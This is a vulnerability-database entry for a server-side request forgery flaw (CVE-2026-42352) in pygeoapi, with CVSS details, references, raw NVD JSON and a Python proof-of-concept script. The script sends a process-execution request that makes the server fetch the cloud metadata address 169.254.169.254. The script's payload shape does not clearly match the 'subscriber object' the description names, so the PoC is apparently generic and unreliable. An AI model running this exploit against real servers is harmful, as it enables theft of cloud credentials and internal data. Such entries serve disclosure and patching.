CVE-2026-42352

Description

pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, OGC API process execution requests can use the subscriber object to requests to internal HTTP services. This issue has been patched in version 0.23.3.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

pygeoapi >= 0.23.0, < 0.23.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable pygeoapi instance
target_url = "http://vulnerable-host.com/processes/execution"

# Malicious payload exploiting the subscriber object to access internal service
# Example: Attempting to access the local metadata service (AWS/Azure/GCP)
payload = {
    "inputs": {
        "resource": {
            "href": "http://169.254.169.254/latest/meta-data/", 
            "type": "application/json",
            "rel": "subscriber"
        }
    },
    "mode": "async"
}

try:
    # Sending the execution request
    response = requests.post(target_url, json=payload)
    
    if response.status_code == 200 or response.status_code == 201:
        print("[+] Request sent successfully. Check results endpoint for SSRF output.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed to send request. Status: {response.status_code}")
        print(f"[-] Response: {response.text}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42352
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42352
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42352/
[4] VulDB https://vuldb.com/cve/CVE-2026-42352
[5] https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef
[6] https://github.com/geopython/pygeoapi/releases/tag/0.23.3
[7] https://github.com/geopython/pygeoapi/security/advisories/GHSA-jgvc-94c8-3chc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42352", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:38.317", "lastModified": "2026-05-08T23:16:38.317", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, OGC API process execution requests can use the subscriber object to requests to internal HTTP services. This issue has been patched in version 0.23.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef", "source": "[email protected]"}, {"url": "https://github.com/geopython/pygeoapi/releases/tag/0.23.3", "source": "[email protected]"}, {"url": "https://github.com/geopython/pygeoapi/security/advisories/GHSA-jgvc-94c8-3chc", "source": "[email protected]"}]}}